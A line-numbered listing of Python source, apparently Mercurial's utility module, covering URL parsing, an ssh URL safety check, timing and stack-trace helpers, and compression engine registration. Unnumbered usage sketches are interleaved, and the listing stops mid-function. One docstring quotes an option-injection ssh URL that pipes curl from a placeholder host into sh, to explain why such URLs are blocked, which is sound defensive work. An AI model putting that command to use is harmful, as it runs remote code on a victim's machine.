3064 3105 <url scheme: 'bundle', path: 'foo'>
3065 3106 >>> url(b'bundle://../foo')
3066 3107 <url scheme: 'bundle', path: '../foo'>
3067 3108 >>> url(br'c:\foo\bar')
3068 3109 <url path: 'c:\\foo\\bar'>
3069 3110 >>> url(br'\\blah\blah\blah')
3070 3111 <url path: '\\\\blah\\blah\\blah'>
3071 3112 >>> url(br'\\blah\blah\blah#baz')
3072 3113 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
3073 3114 >>> url(br'file:///C:\users\me')
3074 3115 <url scheme: 'file', path: 'C:\\users\\me'>
3075 3116
3076 3117 Authentication credentials:
3077 3118
3078 3119 >>> url(b'ssh://joe:xyz@x/repo')
3079 3120 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3080 3121 >>> url(b'ssh://joe@x/repo')
3081 3122 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3082 3123
3083 3124 Query strings and fragments:
3084 3125
3085 3126 >>> url(b'http://host/a?b#c')
3086 3127 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3087 3128 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3088 3129 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3089 3130
3090 3131 Empty path:
3091 3132
3092 3133 >>> url(b'')
3093 3134 <url path: ''>
3094 3135 >>> url(b'#a')
3095 3136 <url path: '', fragment: 'a'>
3096 3137 >>> url(b'http://host/')
3097 3138 <url scheme: 'http', host: 'host', path: ''>
3098 3139 >>> url(b'http://host/#a')
3099 3140 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3100 3141
3101 3142 Only scheme:
3102 3143
3103 3144 >>> url(b'http:')
3104 3145 <url scheme: 'http'>
3105 3146 """
3106 3147
3107 3148 _safechars = "!~*'()+"
3108 3149 _safepchars = "/!~*'()+:\\"
3109 3150 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
3110 3151
3111 3152 def __init__(self, path, parsequery=True, parsefragment=True):
3112 3153 # We slowly chomp away at path until we have only the path left
3113 3154 self.scheme = self.user = self.passwd = self.host = None
3114 3155 self.port = self.path = self.query = self.fragment = None
3115 3156 self._localpath = True
3116 3157 self._hostport = ''
3117 3158 self._origpath = path
3118 3159
3119 3160 if parsefragment and '#' in path:
3120 3161 path, self.fragment = path.split('#', 1)
3121 3162
3122 3163 # special case for Windows drive letters and UNC paths
3123 3164 if hasdriveletter(path) or path.startswith('\\\\'):
3124 3165 self.path = path
3125 3166 return
3126 3167
3127 3168 # For compatibility reasons, we can't handle bundle paths as
3128 3169 # normal URLs
3129 3170 if path.startswith('bundle:'):
3130 3171 self.scheme = 'bundle'
3131 3172 path = path[7:]
3132 3173 if path.startswith('//'):
3133 3174 path = path[2:]
3134 3175 self.path = path
3135 3176 return
3136 3177
3137 3178 if self._matchscheme(path):
3138 3179 parts = path.split(':', 1)
3139 3180 if parts[0]:
3140 3181 self.scheme, path = parts
3141 3182 self._localpath = False
3142 3183
3143 3184 if not path:
3144 3185 path = None
3145 3186 if self._localpath:
3146 3187 self.path = ''
3147 3188 return
3148 3189 else:
3149 3190 if self._localpath:
3150 3191 self.path = path
3151 3192 return
3152 3193
3153 3194 if parsequery and '?' in path:
3154 3195 path, self.query = path.split('?', 1)
3155 3196 if not path:
3156 3197 path = None
3157 3198 if not self.query:
3158 3199 self.query = None
3159 3200
3160 3201 # // is required to specify a host/authority
3161 3202 if path and path.startswith('//'):
3162 3203 parts = path[2:].split('/', 1)
3163 3204 if len(parts) > 1:
3164 3205 self.host, path = parts
3165 3206 else:
3166 3207 self.host = parts[0]
3167 3208 path = None
3168 3209 if not self.host:
3169 3210 self.host = None
3170 3211 # path of file:///d is /d
3171 3212 # path of file:///d:/ is d:/, not /d:/
3172 3213 if path and not hasdriveletter(path):
3173 3214 path = '/' + path
3174 3215
3175 3216 if self.host and '@' in self.host:
3176 3217 self.user, self.host = self.host.rsplit('@', 1)
3177 3218 if ':' in self.user:
3178 3219 self.user, self.passwd = self.user.split(':', 1)
3179 3220 if not self.host:
3180 3221 self.host = None
3181 3222
3182 3223 # Don't split on colons in IPv6 addresses without ports
3183 3224 if (self.host and ':' in self.host and
3184 3225 not (self.host.startswith('[') and self.host.endswith(']'))):
3185 3226 self._hostport = self.host
3186 3227 self.host, self.port = self.host.rsplit(':', 1)
3187 3228 if not self.host:
3188 3229 self.host = None
3189 3230
3190 3231 if (self.host and self.scheme == 'file' and
3191 3232 self.host not in ('localhost', '127.0.0.1', '[::1]')):
3192 3233 raise Abort(_('file:// URLs can only refer to localhost'))
3193 3234
3194 3235 self.path = path
3195 3236
3196 3237 # leave the query string escaped
3197 3238 for a in ('user', 'passwd', 'host', 'port',
3198 3239 'path', 'fragment'):
3199 3240 v = getattr(self, a)
3200 3241 if v is not None:
3201 3242 setattr(self, a, urlreq.unquote(v))
3202 3243
3203 3244 @encoding.strmethod
3204 3245 def __repr__(self):
3205 3246 attrs = []
3206 3247 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
3207 3248 'query', 'fragment'):
3208 3249 v = getattr(self, a)
3209 3250 if v is not None:
3210 3251 attrs.append('%s: %r' % (a, v))
3211 3252 return '<url %s>' % ', '.join(attrs)
3212 3253
3213 3254 def __bytes__(self):
3214 3255 r"""Join the URL's components back into a URL string.
3215 3256
3216 3257 Examples:
3217 3258
3218 3259 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3219 3260 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3220 3261 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3221 3262 'http://user:pw@host:80/?foo=bar&baz=42'
3222 3263 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3223 3264 'http://user:pw@host:80/?foo=bar%3dbaz'
3224 3265 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3225 3266 'ssh://user:pw@[::1]:2200//home/joe#'
3226 3267 >>> bytes(url(b'http://localhost:80//'))
3227 3268 'http://localhost:80//'
3228 3269 >>> bytes(url(b'http://localhost:80/'))
3229 3270 'http://localhost:80/'
3230 3271 >>> bytes(url(b'http://localhost:80'))
3231 3272 'http://localhost:80/'
3232 3273 >>> bytes(url(b'bundle:foo'))
3233 3274 'bundle:foo'
3234 3275 >>> bytes(url(b'bundle://../foo'))
3235 3276 'bundle:../foo'
3236 3277 >>> bytes(url(b'path'))
3237 3278 'path'
3238 3279 >>> bytes(url(b'file:///tmp/foo/bar'))
3239 3280 'file:///tmp/foo/bar'
3240 3281 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3241 3282 'file:///c:/tmp/foo/bar'
3242 3283 >>> print(url(br'bundle:foo\bar'))
3243 3284 bundle:foo\bar
3244 3285 >>> print(url(br'file:///D:\data\hg'))
3245 3286 file:///D:\data\hg
3246 3287 """
3247 3288 if self._localpath:
3248 3289 s = self.path
3249 3290 if self.scheme == 'bundle':
3250 3291 s = 'bundle:' + s
3251 3292 if self.fragment:
3252 3293 s += '#' + self.fragment
3253 3294 return s
3254 3295
3255 3296 s = self.scheme + ':'
3256 3297 if self.user or self.passwd or self.host:
3257 3298 s += '//'
3258 3299 elif self.scheme and (not self.path or self.path.startswith('/')
3259 3300 or hasdriveletter(self.path)):
3260 3301 s += '//'
3261 3302 if hasdriveletter(self.path):
3262 3303 s += '/'
3263 3304 if self.user:
3264 3305 s += urlreq.quote(self.user, safe=self._safechars)
3265 3306 if self.passwd:
3266 3307 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3267 3308 if self.user or self.passwd:
3268 3309 s += '@'
3269 3310 if self.host:
3270 3311 if not (self.host.startswith('[') and self.host.endswith(']')):
3271 3312 s += urlreq.quote(self.host)
3272 3313 else:
3273 3314 s += self.host
3274 3315 if self.port:
3275 3316 s += ':' + urlreq.quote(self.port)
3276 3317 if self.host:
3277 3318 s += '/'
3278 3319 if self.path:
3279 3320 # TODO: similar to the query string, we should not unescape the
3280 3321 # path when we store it, the path might contain '%2f' = '/',
3281 3322 # which we should *not* escape.
3282 3323 s += urlreq.quote(self.path, safe=self._safepchars)
3283 3324 if self.query:
3284 3325 # we store the query in escaped form.
3285 3326 s += '?' + self.query
3286 3327 if self.fragment is not None:
3287 3328 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3288 3329 return s
3289 3330
3290 3331 __str__ = encoding.strmethod(__bytes__)
3291 3332
3292 3333 def authinfo(self):
3293 3334 user, passwd = self.user, self.passwd
3294 3335 try:
3295 3336 self.user, self.passwd = None, None
3296 3337 s = bytes(self)
3297 3338 finally:
3298 3339 self.user, self.passwd = user, passwd
3299 3340 if not self.user:
3300 3341 return (s, None)
3301 3342 # authinfo[1] is passed to urllib2 password manager, and its
3302 3343 # URIs must not contain credentials. The host is passed in the
3303 3344 # URIs list because Python < 2.4.3 uses only that to search for
3304 3345 # a password.
3305 3346 return (s, (None, (s, self.host),
3306 3347 self.user, self.passwd or ''))
3307 3348
3308 3349 def isabs(self):
3309 3350 if self.scheme and self.scheme != 'file':
3310 3351 return True # remote URL
3311 3352 if hasdriveletter(self.path):
3312 3353 return True # absolute for our purposes - can't be joined()
3313 3354 if self.path.startswith(br'\\'):
3314 3355 return True # Windows UNC path
3315 3356 if self.path.startswith('/'):
3316 3357 return True # POSIX-style
3317 3358 return False
3318 3359
3319 3360 def localpath(self):
3320 3361 if self.scheme == 'file' or self.scheme == 'bundle':
3321 3362 path = self.path or '/'
3322 3363 # For Windows, we need to promote hosts containing drive
3323 3364 # letters to paths with drive letters.
3324 3365 if hasdriveletter(self._hostport):
3325 3366 path = self._hostport + '/' + self.path
3326 3367 elif (self.host is not None and self.path
3327 3368 and not hasdriveletter(path)):
3328 3369 path = '/' + path
3329 3370 return path
3330 3371 return self._origpath
3331 3372
3332 3373 def islocal(self):
3333 3374 '''whether localpath will return something that posixfile can open'''
3334 3375 return (not self.scheme or self.scheme == 'file'
3335 3376 or self.scheme == 'bundle')
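As a quick illustration of the parsing above (a sketch; the URL and credentials are invented), ``url`` splits a string into attributes, ``bytes()`` reassembles it, and ``authinfo()`` yields a credential-free URI plus the credentials for the password manager:

    u = url(b'http://alice:secret@example.com:8080/?style=raw')
    # u.scheme = 'http', u.user = 'alice', u.passwd = 'secret',
    # u.host = 'example.com', u.port = '8080', u.query = 'style=raw'
    bytes(u)      # -> 'http://alice:secret@example.com:8080/?style=raw'
    u.authinfo()  # -> ('http://example.com:8080/?style=raw',
                  #     (None, ('http://example.com:8080/?style=raw',
                  #      'example.com'), 'alice', 'secret'))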
3336 3377
3337 3378 def hasscheme(path):
3338 3379 return bool(url(path).scheme)
3339 3380
3340 3381 def hasdriveletter(path):
3341 3382 return path and path[1:2] == ':' and path[0:1].isalpha()
3342 3383
3343 3384 def urllocalpath(path):
3344 3385 return url(path, parsequery=False, parsefragment=False).localpath()
3345 3386
3346 3387 def checksafessh(path):
3347 3388 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3348 3389
3349 3390 This is a sanity check for ssh urls. ssh will parse the first item as
3350 3391 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3351 3392 Let's prevent these potentially exploitable urls entirely and warn the
3352 3393 user.
3353 3394
3354 3395 Raises an error.Abort when the url is unsafe.
3355 3396 """
3356 3397 path = urlreq.unquote(path)
3357 3398 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3358 3399 raise error.Abort(_('potentially unsafe url: %r') %
3359 3400 (pycompat.bytestr(path),))
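
For example (a sketch; the hostile URL is illustrative), a normal URL passes silently while an option-injection attempt aborts:

    checksafessh(b'ssh://example.com/repo')  # fine, returns None
    try:
        checksafessh(b'ssh://-oProxyCommand=evil/repo')
    except error.Abort:
        pass  # ssh would have parsed '-oProxyCommand=evil' as an option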
3360 3401
3361 3402 def hidepassword(u):
3362 3403 '''hide user credential in a url string'''
3363 3404 u = url(u)
3364 3405 if u.passwd:
3365 3406 u.passwd = '***'
3366 3407 return bytes(u)
3367 3408
3368 3409 def removeauth(u):
3369 3410 '''remove all authentication information from a url string'''
3370 3411 u = url(u)
3371 3412 u.user = u.passwd = None
3372 3413 return bytes(u)
3373 3414
3374 3415 timecount = unitcountfn(
3375 3416 (1, 1e3, _('%.0f s')),
3376 3417 (100, 1, _('%.1f s')),
3377 3418 (10, 1, _('%.2f s')),
3378 3419 (1, 1, _('%.3f s')),
3379 3420 (100, 0.001, _('%.1f ms')),
3380 3421 (10, 0.001, _('%.2f ms')),
3381 3422 (1, 0.001, _('%.3f ms')),
3382 3423 (100, 0.000001, _('%.1f us')),
3383 3424 (10, 0.000001, _('%.2f us')),
3384 3425 (1, 0.000001, _('%.3f us')),
3385 3426 (100, 0.000000001, _('%.1f ns')),
3386 3427 (10, 0.000000001, _('%.2f ns')),
3387 3428 (1, 0.000000001, _('%.3f ns')),
3388 3429 )
3389 3430
3390 3431 _timenesting = [0]
3391 3432
3392 3433 def timed(func):
3393 3434 '''Report the execution time of a function call to stderr.
3394 3435
3395 3436 During development, use as a decorator when you need to measure
3396 3437 the cost of a function, e.g. as follows:
3397 3438
3398 3439 @util.timed
3399 3440 def foo(a, b, c):
3400 3441 pass
3401 3442 '''
3402 3443
3403 3444 def wrapper(*args, **kwargs):
3404 3445 start = timer()
3405 3446 indent = 2
3406 3447 _timenesting[0] += indent
3407 3448 try:
3408 3449 return func(*args, **kwargs)
3409 3450 finally:
3410 3451 elapsed = timer() - start
3411 3452 _timenesting[0] -= indent
3412 3453 stderr.write('%s%s: %s\n' %
3413 3454 (' ' * _timenesting[0], func.__name__,
3414 3455 timecount(elapsed)))
3415 3456 return wrapper
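
Each timed call writes one line to stderr on return; nested timed calls report first, indented two spaces per nesting level (names and timings illustrative):

      bar: 120.0 us
    foo: 1.234 ms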
3416 3457
3417 3458 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3418 3459 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3419 3460
3420 3461 def sizetoint(s):
3421 3462 '''Convert a space specifier to a byte count.
3422 3463
3423 3464 >>> sizetoint(b'30')
3424 3465 30
3425 3466 >>> sizetoint(b'2.2kb')
3426 3467 2252
3427 3468 >>> sizetoint(b'6M')
3428 3469 6291456
3429 3470 '''
3430 3471 t = s.strip().lower()
3431 3472 try:
3432 3473 for k, u in _sizeunits:
3433 3474 if t.endswith(k):
3434 3475 return int(float(t[:-len(k)]) * u)
3435 3476 return int(t)
3436 3477 except ValueError:
3437 3478 raise error.ParseError(_("couldn't parse size: %s") % s)
3438 3479
3439 3480 class hooks(object):
3440 3481 '''A collection of hook functions that can be used to extend a
3441 3482 function's behavior. Hooks are called in lexicographic order,
3442 3483 based on the names of their sources.'''
3443 3484
3444 3485 def __init__(self):
3445 3486 self._hooks = []
3446 3487
3447 3488 def add(self, source, hook):
3448 3489 self._hooks.append((source, hook))
3449 3490
3450 3491 def __call__(self, *args):
3451 3492 self._hooks.sort(key=lambda x: x[0])
3452 3493 results = []
3453 3494 for source, hook in self._hooks:
3454 3495 results.append(hook(*args))
3455 3496 return results
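
A minimal usage sketch (source names invented); hooks run in lexicographic source order, not registration order:

    myhooks = hooks()
    myhooks.add('zz-ext', lambda x: x + 1)
    myhooks.add('aa-core', lambda x: x * 2)
    myhooks(3)  # -> [6, 4]: 'aa-core' sorts before 'zz-ext'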
3456 3497
3457 3498 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3458 3499 '''Yields lines for a nicely formatted stacktrace.
3459 3500 Skips the last 'skip' entries, then returns the last 'depth' entries.
3460 3501 Each file+linenumber is formatted according to fileline.
3461 3502 Each line is formatted according to line.
3462 3503 If line is None, it yields:
3463 3504 length of longest filepath+line number,
3464 3505 filepath+linenumber,
3465 3506 function
3466 3507
3467 3508 Not to be used in production code, but very convenient while developing.
3468 3509 '''
3469 3510 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3470 3511 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3471 3512 ][-depth:]
3472 3513 if entries:
3473 3514 fnmax = max(len(entry[0]) for entry in entries)
3474 3515 for fnln, func in entries:
3475 3516 if line is None:
3476 3517 yield (fnmax, fnln, func)
3477 3518 else:
3478 3519 yield line % (fnmax, fnln, func)
3479 3520
3480 3521 def debugstacktrace(msg='stacktrace', skip=0,
3481 3522 f=stderr, otherf=stdout, depth=0):
3482 3523 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3483 3524 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3484 3525 By default it will flush stdout first.
3485 3526 It can be used everywhere and intentionally does not require an ui object.
3486 3527 Not to be used in production code, but very convenient while developing.
3487 3528 '''
3488 3529 if otherf:
3489 3530 otherf.flush()
3490 3531 f.write('%s at:\n' % msg.rstrip())
3491 3532 for line in getstackframes(skip + 1, depth=depth):
3492 3533 f.write(line)
3493 3534 f.flush()
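
Typical output looks like the following (frames, paths and line numbers illustrative):

    stacktrace at:
     mercurial/dispatch.py:1005 in _runcommand
     mercurial/commands.py:3220 in files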
3494 3535
3495 3536 class dirs(object):
3496 3537 '''a multiset of directory names from a dirstate or manifest'''
3497 3538
3498 3539 def __init__(self, map, skip=None):
3499 3540 self._dirs = {}
3500 3541 addpath = self.addpath
3501 3542 if safehasattr(map, 'iteritems') and skip is not None:
3502 3543 for f, s in map.iteritems():
3503 3544 if s[0] != skip:
3504 3545 addpath(f)
3505 3546 else:
3506 3547 for f in map:
3507 3548 addpath(f)
3508 3549
3509 3550 def addpath(self, path):
3510 3551 dirs = self._dirs
3511 3552 for base in finddirs(path):
3512 3553 if base in dirs:
3513 3554 dirs[base] += 1
3514 3555 return
3515 3556 dirs[base] = 1
3516 3557
3517 3558 def delpath(self, path):
3518 3559 dirs = self._dirs
3519 3560 for base in finddirs(path):
3520 3561 if dirs[base] > 1:
3521 3562 dirs[base] -= 1
3522 3563 return
3523 3564 del dirs[base]
3524 3565
3525 3566 def __iter__(self):
3526 3567 return iter(self._dirs)
3527 3568
3528 3569 def __contains__(self, d):
3529 3570 return d in self._dirs
3530 3571
3531 3572 if safehasattr(parsers, 'dirs'):
3532 3573 dirs = parsers.dirs
3533 3574
3534 3575 def finddirs(path):
3535 3576 pos = path.rfind('/')
3536 3577 while pos != -1:
3537 3578 yield path[:pos]
3538 3579 pos = path.rfind('/', 0, pos)
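
A short sketch of the two helpers above (paths invented): ``finddirs`` yields ancestor directories nearest-first, and ``dirs`` reference-counts them, so a directory stays present until its last file is removed:

    list(finddirs('a/b/c'))   # -> ['a/b', 'a']
    d = dirs(['a/b/c', 'a/b/d'])
    'a/b' in d                # True
    d.delpath('a/b/c')
    'a/b' in d                # still True; 'a/b/d' remains
    d.delpath('a/b/d')
    'a/b' in d                # False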
3539 3580
3540 3581 # compression code
3541 3582
3542 3583 SERVERROLE = 'server'
3543 3584 CLIENTROLE = 'client'
3544 3585
3545 3586 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3546 3587 (u'name', u'serverpriority',
3547 3588 u'clientpriority'))
3548 3589
3549 3590 class compressormanager(object):
3550 3591 """Holds registrations of various compression engines.
3551 3592
3552 3593 This class essentially abstracts the differences between compression
3553 3594 engines to allow new compression formats to be added easily, possibly from
3554 3595 extensions.
3555 3596
3556 3597 Compressors are registered against the global instance by calling its
3557 3598 ``register()`` method.
3558 3599 """
3559 3600 def __init__(self):
3560 3601 self._engines = {}
3561 3602 # Bundle spec human name to engine name.
3562 3603 self._bundlenames = {}
3563 3604 # Internal bundle identifier to engine name.
3564 3605 self._bundletypes = {}
3565 3606 # Revlog header to engine name.
3566 3607 self._revlogheaders = {}
3567 3608 # Wire proto identifier to engine name.
3568 3609 self._wiretypes = {}
3569 3610
3570 3611 def __getitem__(self, key):
3571 3612 return self._engines[key]
3572 3613
3573 3614 def __contains__(self, key):
3574 3615 return key in self._engines
3575 3616
3576 3617 def __iter__(self):
3577 3618 return iter(self._engines.keys())
3578 3619
3579 3620 def register(self, engine):
3580 3621 """Register a compression engine with the manager.
3581 3622
3582 3623 The argument must be a ``compressionengine`` instance.
3583 3624 """
3584 3625 if not isinstance(engine, compressionengine):
3585 3626 raise ValueError(_('argument must be a compressionengine'))
3586 3627
3587 3628 name = engine.name()
3588 3629
3589 3630 if name in self._engines:
3590 3631 raise error.Abort(_('compression engine %s already registered') %
3591 3632 name)
3592 3633
3593 3634 bundleinfo = engine.bundletype()
3594 3635 if bundleinfo:
3595 3636 bundlename, bundletype = bundleinfo
3596 3637
3597 3638 if bundlename in self._bundlenames:
3598 3639 raise error.Abort(_('bundle name %s already registered') %
3599 3640 bundlename)
3600 3641 if bundletype in self._bundletypes:
3601 3642 raise error.Abort(_('bundle type %s already registered by %s') %
3602 3643 (bundletype, self._bundletypes[bundletype]))
3603 3644
3604 3645 # No external facing name declared.
3605 3646 if bundlename:
3606 3647 self._bundlenames[bundlename] = name
3607 3648
3608 3649 self._bundletypes[bundletype] = name
3609 3650
3610 3651 wiresupport = engine.wireprotosupport()
3611 3652 if wiresupport:
3612 3653 wiretype = wiresupport.name
3613 3654 if wiretype in self._wiretypes:
3614 3655 raise error.Abort(_('wire protocol compression %s already '
3615 3656 'registered by %s') %
3616 3657 (wiretype, self._wiretypes[wiretype]))
3617 3658
3618 3659 self._wiretypes[wiretype] = name
3619 3660
3620 3661 revlogheader = engine.revlogheader()
3621 3662 if revlogheader and revlogheader in self._revlogheaders:
3622 3663 raise error.Abort(_('revlog header %s already registered by %s') %
3623 3664 (revlogheader, self._revlogheaders[revlogheader]))
3624 3665
3625 3666 if revlogheader:
3626 3667 self._revlogheaders[revlogheader] = name
3627 3668
3628 3669 self._engines[name] = engine
3629 3670
3630 3671 @property
3631 3672 def supportedbundlenames(self):
3632 3673 return set(self._bundlenames.keys())
3633 3674
3634 3675 @property
3635 3676 def supportedbundletypes(self):
3636 3677 return set(self._bundletypes.keys())
3637 3678
3638 3679 def forbundlename(self, bundlename):
3639 3680 """Obtain a compression engine registered to a bundle name.
3640 3681
3641 3682 Will raise KeyError if the bundle type isn't registered.
3642 3683
3643 3684 Will abort if the engine is known but not available.
3644 3685 """
3645 3686 engine = self._engines[self._bundlenames[bundlename]]
3646 3687 if not engine.available():
3647 3688 raise error.Abort(_('compression engine %s could not be loaded') %
3648 3689 engine.name())
3649 3690 return engine
3650 3691
3651 3692 def forbundletype(self, bundletype):
3652 3693 """Obtain a compression engine registered to a bundle type.
3653 3694
3654 3695 Will raise KeyError if the bundle type isn't registered.
3655 3696
3656 3697 Will abort if the engine is known but not available.
3657 3698 """
3658 3699 engine = self._engines[self._bundletypes[bundletype]]
3659 3700 if not engine.available():
3660 3701 raise error.Abort(_('compression engine %s could not be loaded') %
3661 3702 engine.name())
3662 3703 return engine
3663 3704
3664 3705 def supportedwireengines(self, role, onlyavailable=True):
3665 3706 """Obtain compression engines that support the wire protocol.
3666 3707
3667 3708 Returns a list of engines in prioritized order, most desired first.
3668 3709
3669 3710 If ``onlyavailable`` is set, filter out engines that can't be
3670 3711 loaded.
3671 3712 """
3672 3713 assert role in (SERVERROLE, CLIENTROLE)
3673 3714
3674 3715 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3675 3716
3676 3717 engines = [self._engines[e] for e in self._wiretypes.values()]
3677 3718 if onlyavailable:
3678 3719 engines = [e for e in engines if e.available()]
3679 3720
3680 3721 def getkey(e):
3681 3722 # Sort first by priority, highest first. In case of tie, sort
3682 3723 # alphabetically. This is arbitrary, but ensures output is
3683 3724 # stable.
3684 3725 w = e.wireprotosupport()
3685 3726 return -1 * getattr(w, attr), w.name
3686 3727
3687 3728 return list(sorted(engines, key=getkey))
3688 3729
3689 3730 def forwiretype(self, wiretype):
3690 3731 engine = self._engines[self._wiretypes[wiretype]]
3691 3732 if not engine.available():
3692 3733 raise error.Abort(_('compression engine %s could not be loaded') %
3693 3734 engine.name())
3694 3735 return engine
3695 3736
3696 3737 def forrevlogheader(self, header):
3697 3738 """Obtain a compression engine registered to a revlog header.
3698 3739
3699 3740 Will raise KeyError if the revlog header value isn't registered.
3700 3741 """
3701 3742 return self._engines[self._revlogheaders[header]]
3702 3743
3703 3744 compengines = compressormanager()
3704 3745
3705 3746 class compressionengine(object):
3706 3747 """Base class for compression engines.
3707 3748
3708 3749 Compression engines must implement the interface defined by this class.
3709 3750 """
3710 3751 def name(self):
3711 3752 """Returns the name of the compression engine.
3712 3753
3713 3754 This is the key the engine is registered under.
3714 3755
3715 3756 This method must be implemented.
3716 3757 """
3717 3758 raise NotImplementedError()
3718 3759
3719 3760 def available(self):
3720 3761 """Whether the compression engine is available.
3721 3762
3722 3763 The intent of this method is to allow optional compression engines
3723 3764 that may not be available in all installations (such as engines relying
3724 3765 on C extensions that may not be present).
3725 3766 """
3726 3767 return True
3727 3768
3728 3769 def bundletype(self):
3729 3770 """Describes bundle identifiers for this engine.
3730 3771
3731 3772 If this compression engine isn't supported for bundles, returns None.
3732 3773
3733 3774 If this engine can be used for bundles, returns a 2-tuple of strings of
3734 3775 the user-facing "bundle spec" compression name and an internal
3735 3776 identifier used to denote the compression format within bundles. To
3736 3777 exclude the name from external usage, set the first element to ``None``.
3737 3778
3738 3779 If bundle compression is supported, the class must also implement
3739 3780 ``compressstream`` and ``decompressorreader``.
3740 3781
3741 3782 The docstring of this method is used in the help system to tell users
3742 3783 about this engine.
3743 3784 """
3744 3785 return None
3745 3786
3746 3787 def wireprotosupport(self):
3747 3788 """Declare support for this compression format on the wire protocol.
3748 3789
3749 3790 If this compression engine isn't supported for compressing wire
3750 3791 protocol payloads, returns None.
3751 3792
3752 3793 Otherwise, returns ``compenginewireprotosupport`` with the following
3753 3794 fields:
3754 3795
3755 3796 * String format identifier
3756 3797 * Integer priority for the server
3757 3798 * Integer priority for the client
3758 3799
3759 3800 The integer priorities are used to order the advertisement of format
3760 3801 support by server and client. The highest integer is advertised
3761 3802 first. Integers with non-positive values aren't advertised.
3762 3803
3763 3804 The priority values are somewhat arbitrary and only used for default
3764 3805 ordering. The relative order can be changed via config options.
3765 3806
3766 3807 If wire protocol compression is supported, the class must also implement
3767 3808 ``compressstream`` and ``decompressorreader``.
3768 3809 """
3769 3810 return None
3770 3811
3771 3812 def revlogheader(self):
3772 3813 """Header added to revlog chunks that identifies this engine.
3773 3814
3774 3815 If this engine can be used to compress revlogs, this method should
3775 3816 return the bytes used to identify chunks compressed with this engine.
3776 3817 Else, the method should return ``None`` to indicate it does not
3777 3818 participate in revlog compression.
3778 3819 """
3779 3820 return None
3780 3821
3781 3822 def compressstream(self, it, opts=None):
3782 3823 """Compress an iterator of chunks.
3783 3824
3784 3825 The method receives an iterator (ideally a generator) of chunks of
3785 3826 bytes to be compressed. It returns an iterator (ideally a generator)
3786 3827 of bytes of chunks representing the compressed output.
3787 3828
3788 3829 Optionally accepts an argument defining how to perform compression.
3789 3830 Each engine treats this argument differently.
3790 3831 """
3791 3832 raise NotImplementedError()
3792 3833
3793 3834 def decompressorreader(self, fh):
3794 3835 """Perform decompression on a file object.
3795 3836
3796 3837 Argument is an object with a ``read(size)`` method that returns
3797 3838 compressed data. Return value is an object with a ``read(size)`` that
3798 3839 returns uncompressed data.
3799 3840 """
3800 3841 raise NotImplementedError()
3801 3842
3802 3843 def revlogcompressor(self, opts=None):
3803 3844 """Obtain an object that can be used to compress revlog entries.
3804 3845
3805 3846 The object has a ``compress(data)`` method that compresses binary
3806 3847 data. This method returns compressed binary data or ``None`` if
3807 3848 the data could not be compressed (too small, not compressible, etc).
3808 3849 The returned data should have a header uniquely identifying this
3809 3850 compression format so decompression can be routed to this engine.
3810 3851 This header should be identified by the ``revlogheader()`` return
3811 3852 value.
3812 3853
3813 3854 The object has a ``decompress(data)`` method that decompresses
3814 3855 data. The method will only be called if ``data`` begins with
3815 3856 ``revlogheader()``. The method should return the raw, uncompressed
3816 3857 data or raise a ``RevlogError``.
3817 3858
3818 3859 The object is reusable but is not thread safe.
3819 3860 """
3820 3861 raise NotImplementedError()
3821 3862
3822 3863 class _zlibengine(compressionengine):
3823 3864 def name(self):
3824 3865 return 'zlib'
3825 3866
3826 3867 def bundletype(self):
3827 3868 """zlib compression using the DEFLATE algorithm.
3828 3869
3829 3870 All Mercurial clients should support this format. The compression
3830 3871 algorithm strikes a reasonable balance between compression ratio
3831 3872 and size.
3832 3873 """
3833 3874 return 'gzip', 'GZ'
3834 3875
3835 3876 def wireprotosupport(self):
3836 3877 return compewireprotosupport('zlib', 20, 20)
3837 3878
3838 3879 def revlogheader(self):
3839 3880 return 'x'
3840 3881
3841 3882 def compressstream(self, it, opts=None):
3842 3883 opts = opts or {}
3843 3884
3844 3885 z = zlib.compressobj(opts.get('level', -1))
3845 3886 for chunk in it:
3846 3887 data = z.compress(chunk)
3847 3888 # Not all calls to compress emit data. It is cheaper to inspect
3848 3889 # here than to feed empty chunks through the generator.
3849 3890 if data:
3850 3891 yield data
3851 3892
3852 3893 yield z.flush()
3853 3894
3854 3895 def decompressorreader(self, fh):
3855 3896 def gen():
3856 3897 d = zlib.decompressobj()
3857 3898 for chunk in filechunkiter(fh):
3858 3899 while chunk:
3859 3900 # Limit output size to limit memory.
3860 3901 yield d.decompress(chunk, 2 ** 18)
3861 3902 chunk = d.unconsumed_tail
3862 3903
3863 3904 return chunkbuffer(gen())
3864 3905
3865 3906 class zlibrevlogcompressor(object):
3866 3907 def compress(self, data):
3867 3908 insize = len(data)
3868 3909 # Caller handles empty input case.
3869 3910 assert insize > 0
3870 3911
3871 3912 if insize < 44:
3872 3913 return None
3873 3914
3874 3915 elif insize <= 1000000:
3875 3916 compressed = zlib.compress(data)
3876 3917 if len(compressed) < insize:
